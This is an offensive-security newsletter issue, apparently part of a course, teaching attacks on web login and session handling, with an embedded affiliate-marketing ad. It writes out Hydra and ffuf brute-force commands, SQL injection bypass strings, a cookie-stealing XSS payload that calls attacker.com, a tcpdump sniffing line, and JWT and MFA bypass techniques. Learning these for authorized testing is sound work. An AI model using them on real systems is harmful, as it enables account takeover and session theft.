Break the Web (Week 2): Authentication & Session Management

In partnership with

🎯 Week 2: Authentication & Session Management

Break the Web: Part 2 of 8

Welcome back to Offensive Tuesday.

Hey 👋

Last week we mapped the attack surface. You found subdomains, open ports, and exposed services. If you missed week 1, here it is 👉 Click here

This week? We're breaking in.

Authentication is the front door of every web app. And session management is what keeps you inside once you're through.

Here's the deal — most apps get this wrong. Weak passwords, broken session tokens, predictable cookies, missing 2FA.

Today you're learning how to exploit all of it.

Let's get into it.

❓Do you sell on Amazon or Walmart but struggle to drive external traffic that converts?

Is Your PPC Strategy Leaving Money on the Table?

When’s the last time you updated your digital marketing strategy?

If you’re relying on old-school PPC tactics you might be missing out on a major revenue opportunity.

Levanta’s Affiliate Ad Shift Calculator shows how shifting budget from PPC to creator-led partnerships can significantly improve conversion rates, ROI, and efficiency.

Discover how optimizing your affiliate strategy can unlock new profit potential:

• Commission structure: Find the ideal balance between cost and performance

• Traffic mix: See how creator-driven traffic impacts conversions

• Creator engagement: Measure how authentic partnerships scale ROI

Built for brands ready to modernize how they grow.

Get your free calculation.

🧠 What is Authentication?

Authentication proves who you are.

Common methods:

• Username + Password (most attacked)

• Multi-Factor Authentication (SMS, authenticator apps)

• OAuth (Login with Google/GitHub)

• API Keys

• Biometrics

Your goal: bypass, brute-force, or steal credentials.

🔐 What is Session Management?

Once authenticated, the server remembers you with a session token (usually a cookie).

Think of it like a wristband at a concert. Show it once, get in. Keep wearing it, stay in.

Your goal: steal, hijack, or forge session tokens.

🔧 The Attack Process

Step 1: Identify the Login Mechanism

Open DevTools (F12) → Network tab → Try logging in

Watch for:

• POST requests to /login, /auth, /signin

• Set-Cookie headers

• JWT tokens

• Session IDs

Using Burp Suite:

Intercept the login:

POST /login HTTP/1.1
username=admin&password=password123

Response:

Set-Cookie: session=abc123xyz; HttpOnly; Secure

That's your session token.

Step 2: Test for Weak Passwords

Default Credentials

Try these first:

admin / admin
admin / password
root / root

Brute Force with Hydra

hydra -l admin -P rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

• -l admin — Username

• -P rockyou.txt — Password list

• F=incorrect — Failure string

Using Burp Intruder

1. Capture login request

2. Send to Intruder (Ctrl+I)

3. Mark password field as payload

4. Load password list

5. Look for different response length

Step 3: Username Enumeration

Apps often respond differently for valid vs invalid usernames.

Valid: "Incorrect password"
Invalid: "User not found"

With ffuf:

ffuf -w usernames.txt -X POST -d "username=FUZZ&password=test" -u https://target.com/login -fc 401

Step 4: Bypass Authentication

SQL Injection

Try these in the username field:

' OR '1'='1
' OR '1'='1'--
admin'--

Why it works:

SELECT * FROM users WHERE username='' OR '1'='1'--' AND password='anything'

'1'='1' is always true. -- comments out the password check.

Logic Flaws

Try adding parameters:

POST /login
username=admin&password=wrong&authenticated=true

Or manipulate cookies:

Set-Cookie: loggedin=false

Change to:

Cookie: loggedin=true

Step 5: Session Token Analysis

Check your cookies in DevTools → Application → Cookies

Look for:

• HttpOnly — JavaScript can't access ✅

• Secure — Only sent over HTTPS ✅

• SameSite — Protects against CSRF ✅

Weak cookie:

Set-Cookie: session=abc123;

Strong cookie:

Set-Cookie: session=xyz789; HttpOnly; Secure; SameSite=Strict

Step 6: Session Hijacking

Method 1: XSS (if available)

<script>
fetch('https://attacker.com/steal?c=' + document.cookie);
</script>

Method 2: Network Sniffing

sudo tcpdump -i wlan0 -A | grep "Cookie:"

Method 3: Session Fixation

1. Get a session ID from the site

2. Send victim: https://target.com/login?sessionid=YOUR_ID

3. Victim logs in

4. You share their session

Step 7: JWT Token Attacks

A JWT looks like:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature

Three parts: Header.Payload.Signature

Decode it:

Use jwt.io or:

echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d

Attack 1: None Algorithm

Change "alg" to "none" and remove signature:

eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.

Attack 2: Weak Secret

Crack it:

hashcat -a 0 -m 16500 jwt.txt rockyou.txt

Attack 3: Payload Manipulation

Decode payload:

{"user": "john", "role": "user"}

Change to:

{"user": "admin", "role": "admin"}

Re-encode and test.

Step 8: MFA Bypass

Response Manipulation

Intercept:

POST /verify-mfa
code=123456

Response:

{"valid": false}

Change to:

{"valid": true}

Brute Force

6-digit codes = 1 million possibilities. Use Burp Intruder with numbers 0-999999.

Session Not Invalidated

Login without completing MFA. Check if you got a session token anyway.

🛠️ Tool List

Password Attacks

• Hydra — github.com/vanhauser-thc/thc-hydra

• Burp Suite — portswigger.net/burp

Session Analysis

• Burp Suite — portswigger.net/burp

• OWASP ZAP — zaproxy.org

JWT Attacks

• jwt_tool — github.com/ticarpi/jwt_tool

• jwt.io — jwt.io

• Hashcat — hashcat.net

Password Lists

• rockyou.txt — /usr/share/wordlists/rockyou.txt

• SecLists — github.com/danielmiessler/SecLists

📚 Learning Resources

Practice:

• PortSwigger Academy — portswigger.net/web-security

• TryHackMe — Authentication Bypass room

• Hack The Box — hackthebox.com

Reading:

• OWASP Authentication Cheat Sheet

• PortSwigger authentication vulnerabilities

• HackerOne bug bounty reports

✅ Week 2 Checklist

• [ ] Identify how a web app handles authentication

• [ ] Perform brute force with Hydra

• [ ] Test for username enumeration

• [ ] Attempt SQL injection in login forms

• [ ] Analyze session cookies

• [ ] Decode and manipulate JWT tokens

• [ ] Recognize MFA bypass techniques

🎯 Key Takeaways

Authentication is the weakest link. Default credentials and weak passwords are everywhere.

Sessions are just tokens. Steal the token, steal the session.

JWTs can be cracked. Weak secrets, none algorithm, and payload manipulation all work.

MFA isn't foolproof. Response manipulation and brute force can bypass it.

Test systematically. Identify → test credentials → analyze tokens → exploit.

That's Week 2. 🔥

Tomorrow (Wednesday): how to build secure authentication and defend against these attacks.

Next Tuesday: Access Control & IDOR — we're breaking authorization.

See you then.

— Zwire✌️

P.S. Got questions? Reply to this email. I read everything.